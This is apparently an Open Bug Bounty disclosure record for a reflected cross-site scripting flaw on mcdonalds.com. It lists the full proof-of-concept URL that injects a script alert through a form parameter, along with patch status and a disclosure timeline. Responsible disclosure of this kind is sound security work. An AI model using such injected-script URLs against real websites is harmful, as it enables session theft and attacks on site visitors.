mcdonalds.com XSS vulnerability

2016-10-21T14:09:00
ID OBB:187547
Type openbugbounty
Reporter Xany
Modified 2016-11-22T15:16:00

Description

Vulnerable URL:
https://www.mcdonalds.com/us/en/errors/404.emailform.html?hidSendEmail=no&hidPageTitle;=vega%C3%82%C2%A4tPageTitle=404%C3%82%C2%A4tPageUrl=http://www.mcdonalds.com/us/en/errors/404.html%C3%82%C2%A4tPagePath=1&newsPagePath;=1%22%20src=--%3E%3Cscript%3E%20alert(%27/OPENBUGBOUNTY/%27);%3C/script%3E%27%22&send;_to=1&your;_name=Joey&kaptcha;=1
Details:

Description| Value
---|---
Patched:| Yes, at 24.06.2017
Latest check for patch:| 24.06.2017 21:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 10635
VIP website status:| Yes
Check mcdonalds.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 October, 2016 14:09 GMT
Vulnerability existence verified and confirmed| 25 October, 2016 14:24 GMT
Generic security notifications sent to website owner| 25 October, 2016 14:24 GMT
Customized security notification sent to website owner| 25 October, 2016 14:24 GMT
Notification sent to subscribers (without technical details)| 25 October, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 22 November, 2016 15:16 GMT